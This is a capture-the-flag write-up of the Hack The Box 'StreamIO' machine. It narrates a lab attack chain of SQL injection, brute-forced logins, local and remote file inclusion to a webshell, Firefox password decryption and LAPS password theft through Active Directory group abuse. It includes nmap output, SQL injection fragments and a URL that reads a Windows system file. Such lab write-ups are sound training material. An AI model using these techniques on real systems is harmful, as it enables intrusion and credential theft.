search
LinkedInHTB ProfileAbout
Page cover

HTB - StreamIO

hashtag
Machine Info

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we found Firefox profile contains database which can extract saved credentials from it. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.

hashtag
Enumeration

Scope

IP Address: 10.10.11.158

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-09T09:09:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s

Before I start enumeration process, I will update /etc/hosts with the info from Nmap script output

DNS Enumeration

I tried zone transfer but failed

RPC & SMB Enumeration

I got access denied when enumerating the two services

KERBEROS Enumeration

Then, I attempted to enumerate username looking for possible path but also nothing found

HTTP & HTTPS enumeration

http://10.10.11.158

https://10.10.11.158

I tried fuzzing subdomains, but nothing found, however when I tried subdomain fuzzing against https protocol, I got a hit

https://watch.streamIO.htb

I looked at Wappalyzer to see what technology being used and PHP took my attention as it's not common to run php on IIS, So I attempted directory fuzzing against https://watch.streamIO.htb

Also, attempt php files fuzzing on https://steamIO.htb

https://streamIO.htb/login.php

I don't have any credentials, So I will return if obtained one.

https://watch.streamIO.htb/search.php

It's a search function that searches of film name in specific table which can be considered as database, and we can attempt sql injection.

When I delivered a simple payload, I get blocked by some security defences in place

blocked.php

So, I can't use SQLMap and I will continue manually.

Something interesting took my attention here. when I type a word like man it matched it from both side.

It returns Batman, Anger Management so it uses wildcard such as *Search*.

The SQL Command maybe like this

I can break the code with something like that input';--

I was right and when I typed man';-- It matches only wildcard from right side as we already escape the left side

Let's Create our exploit, I tried union 1,2,... until I got a hit at union 1,2,3,4,5,6

Field 2 is got triggered So I will inject command on it

So, we're dealing with MSSQL database, we can use command from this cheat sheet:

MSSQL Injection Cheat Sheetpentestmonkeychevron-right

Get the use name:

Current Database:

We're on MSSQL database, So one common attack vector is that we can get the hash on current use by executing the following command. I did it but failed as I got the machine account hash and couldn't be cracked

Continue to explore the database

We're already in STREAMIO, Let's explore the tables

When I provided an asterisk * it didn't return anything but when I provide username it returned list of usernames

when I provide password, it returned list of hashes, but I can't copy and paste them one by one, it's a waste of time

I looked at burp to see the HTML tag that the hashes is included in

So, I will use curl command to get a list of hashes and filter the results

I will do the same thing with usernames

hashtag
Initial Access

The username list is big for brute forcing so I will try to know who is really has account on the machine by enumerating Kerberos

I got a user's list and hashes list, Let's attempt to crack the hashed and then try brute forcing.

First, Start hashcat in auto-detection mode the know the type of hash

Not all the hash cracked but we will be fine with what we found

Creating passwords list for brute forcing

Unfortunately, I didn't get a hit when I tried brute forcing

I remember the login.php page that I left behind as I didn't have any credentials.

Intercept the request and send it to intruder and then start the attack with passwords we have

Fuzzing for '/admin' directory and parameters

https://streamio.htb/admin/master.php

There is a missing parameter or something, Let's try parameter fuzzing

https://streamio.htb/admin/?debug=

I tried LFI in this parameter and I got a hit https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts

I will use this vulnerability to read the content of master.php using php wrapper

hashtag
Shell as yoshihide

The file is check it has to be included

Looking at the end of code, It takes the input in parameter include in POST request.

I will include master.php from https://streamio.htb/admin/?debug= and append inlcude parameter to the POST request to meet the conditions.

We have found LFI before but RFI didn't work on Debug= parameter, So I will try RFI on include parameter

we got a hit, Let's create a webshell for us.

I looked around, found login.php and decided to explore its content

I searched for other passwords that maybe exists and find one

It's a password for mssql database

hashtag
Shell as nikk37

Let's examine the db with SQLCMD tool

shorten our users list by ensuring that the username already exists

Only one hash was cracked, So it must be for one of the two users

Confirm

User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx

hashtag
Privilege Escalation

I found that the system has Mozilla Firefox installed, So I looked at the user Mozilla profile and I copied it to my kali machine to try decrypt the Firefox secrets and cookies

Start SMB Server

I change directory the folder I copied from windows box and start firepwd.py to decrypt Firefox secrets.

LogoGitHub - lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwordsGitHubchevron-right

I found some credentials let's try them on brute forcing account

  • I fired up bloodhound to see what the user JDgodd can do and file the following:

    • JDgodd Can writeOwner on CORE STAFF group which enable use to add ourselves in that group

    • CORE STAFF group has the rights to read LAPS password on the DC machine

Let's list the command we will use for that purpose:

I personally use crackmapexec to pull the laps

Alternative way from the community using ldapsearch

Root Flag: fcca05f1388d18d964521ce53582793

PreviousHTB - ManagerNextHTB - Cascade

Last updated